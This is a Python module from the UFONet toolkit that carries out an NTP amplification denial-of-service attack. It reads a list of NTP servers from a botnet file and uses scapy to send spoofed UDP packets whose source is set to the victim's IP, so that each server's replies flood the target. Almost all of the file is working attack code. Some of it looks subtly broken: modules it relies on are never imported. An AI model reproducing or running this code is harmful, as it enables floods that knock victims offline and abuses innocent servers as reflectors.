monlist.py 3.1 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import sys, random
  11. try:
  12. from scapy import *
  13. except:
  14. print("\nError importing: scapy lib.\n")
  15. sys.exit(2)
  16. ntp_file = "botnet/ntp.txt" # NTP servers IP list
  17. #data = "\x17\x00\x03\x2a" + "\x00" * 4 # NTP v2 Monlist 'magic' packet!
  18. data = "\x1b\x00\x00\x00"+"\x00"*11*4 # NTP v3 Monlist 'magic' packet!
  19. # UFONet NTP Amplification (MONLIST) / [Port: 123]
  20. def monlistize(ip, rounds):
  21. n=0
  22. try: # (NTP) Amplification attack uses publically accessible NTP servers to flood a target with NTP response traffic
  23. with open(ntp_file) as f: # extract NTP servers from file
  24. ntp_d = f.read().splitlines()
  25. f.close()
  26. p_num=0
  27. for x in range (0,int(rounds)):
  28. try:
  29. n=n+1
  30. print("[Info] [AI] [MONLIST] Breaking NTP 'parsec' ["+str(n)+"] and remaking space-time on it! -> [SLOWING!]")
  31. for j in ntp_d:
  32. p_num += 1
  33. packet = IP(dst=j,src=ip)/UDP(sport=random.randint(2000,65535),dport=123)/Raw(load=data)
  34. try:
  35. send(packet, verbose=0) # not using sr1 because non-replies are required
  36. print(("[Info] [AI] [MONLIST] Broken NTP 'parsec' [{}]".format(p_num))+" IS INTERACTING WITH ["+str(j)+"] -> [AMPLIFYING!]")
  37. except:
  38. print(("[Info] [AI] [MONLIST] Broken NTP 'parsec' [{}]".format(p_num))+" HAS FAILED to interact with ["+str(j)+"] -> [PASSING!]")
  39. except:
  40. print("[Error] [AI] [MONLIST] Failed breaking NTP 'parsec' ["+str(n)+"]")
  41. except:
  42. print("[Error] [AI] [MONLIST] Failing to engage... -> Is still target online? -> [Checking!]")
  43. class MONLIST(object):
  44. def attacking(self, target, rounds):
  45. print("[Info] [AI] NTP Amplification (MONLIST) is ready to broke: [" , rounds, "parsecs ]")
  46. if target.startswith('http://'):
  47. target = target.replace('http://','')
  48. elif target.startswith('https://'):
  49. target = target.replace('https://','')
  50. try:
  51. ip = socket.gethostbyname(target)
  52. except:
  53. try:
  54. import dns.resolver
  55. r = dns.resolver.Resolver()
  56. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  57. url = urlparse(target)
  58. a = r.query(url.netloc, "A") # A record
  59. for rd in a:
  60. ip = str(rd)
  61. except:
  62. ip = target
  63. if ip == "127.0.0.1" or ip == "localhost":
  64. print("[Info] [AI] [MONLIST] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n")
  65. return
  66. monlistize(ip, rounds) # attack with MONLIST using threading